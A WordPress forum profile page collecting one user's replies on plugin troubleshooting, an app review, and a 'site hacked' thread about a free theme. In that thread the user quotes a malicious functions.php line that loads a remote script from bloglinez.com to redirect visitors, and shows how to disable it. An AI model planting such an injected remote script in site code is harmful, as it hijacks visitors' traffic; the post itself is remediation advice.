vancoovur
Forum Replies Created
-
Forum: Plugins
In reply to: [Ad King Pro] How do I turn on the rotate feature?Will do Ash. Thanks for that and brilliant plugin btw.
Forum: Plugins
In reply to: [Ad King Pro] How do I turn on the rotate feature?UPDATE: I’m not sure what happened but the site is now displaying the rotating images correctly. I’ll advise if that changes. ??
———ORIGINAL MESSAGE———
I’m having the same rotation issue. We’re moving our website to WPEngine.com and I’m testing the plugin to rotate story teasers (replacing Max Banner Ads PRO).
I have added the following to single.php:<?php if (function_exists('adkingpro_func')) echo do_shortcode("[adkingpro type='story' rotate='true' speed='5000' changespeed='600' effect='fade']"); ?>
The first image appears and will click thru correctly but it does not rotate through the other advert type images. I also tried the widget, configuring the advert type and rotation options and a text widget using the shortcode from the generator.
Not sure what I’m doing wrong here.
Staging site is not accessible outside our network so unfortunately cannot supply the URL.Forum: Reviews
In reply to: [UppSite - Go Mobile (iPhone, Android, HTML5)] Rip off AVOIDNot advising prospective users about the additional fee to remove ads is akin to extortion. And the support note asking “There is an option fo disable ads to a 34.99 USD one off charge.
Would you like to go ahead with that?” is laughable. I’ve installed it but will now uninstall and avoid.Forum: Fixing WordPress
In reply to: [caption id="" shows up in page bodyWas this issue ever resolved as I’m having the same problem. Please advise if you found a fix. Thanks!
Forum: Fixing WordPress
In reply to: Is my site hacked?moemontreal…loads find at my end (some errors but mostly missing images having nothing to do with your theme)
Forum: Fixing WordPress
In reply to: Is my site hacked?I can upload to server or email if you like but with one line of code in a previously legit (and now unavailable) theme, chances are slim.
Forum: Fixing WordPress
In reply to: Is my site hacked?BTW…cool sports site.
Forum: Fixing WordPress
In reply to: Is my site hacked?The code wasn’t added to your site…It’s been there all the time. They just flipped the switch using the target js and your site started redirecting. It will be fine now you’ve removed the function so sleep soundly.
Forum: Fixing WordPress
In reply to: Is my site hacked?I was just in the midst of trying to find out where I got it when I found this post (I downloaded ‘HotGoss’ a few months ago and started having a problem this morning). I’m still searching and will advise if/when I find the source.
I’m guessing that the redirect is switched on and off at whim to route traffic to the target site. Once they have enough people using the theme they start throwing the switch.Forum: Fixing WordPress
In reply to: Is my site hacked?Moemontreal…it’s working ok from here (and there’s no longer a reference to bloglinez.com in the page)
Forum: Fixing WordPress
In reply to: Is my site hacked?Another reason to avoid those nasty ‘free’ WP themes.
Forum: Fixing WordPress
In reply to: Is my site hacked?You can prevent this from happening again by editing your ‘functions.php’ file. Look for this:
function my_settings() {
echo ‘<script src=”https://www.bloglinez.com/theme.js” type=”text/javascript”></script>’;
}Then change it to this:
function my_settings() {
// echo ”;
}It will no longer access theme.js on the bloglinez.com server (which is basically a script to redirect your theme) and you should have no further problems.
I’m getting the same thing combined with a weird effect when I hover…all the post copy appears at once creating a blob of text although the featured image remains the same. It would be great to see a fix in my lifetime. ??
I’ve started getting the same error and have removed the plugin until the issue has been resolved.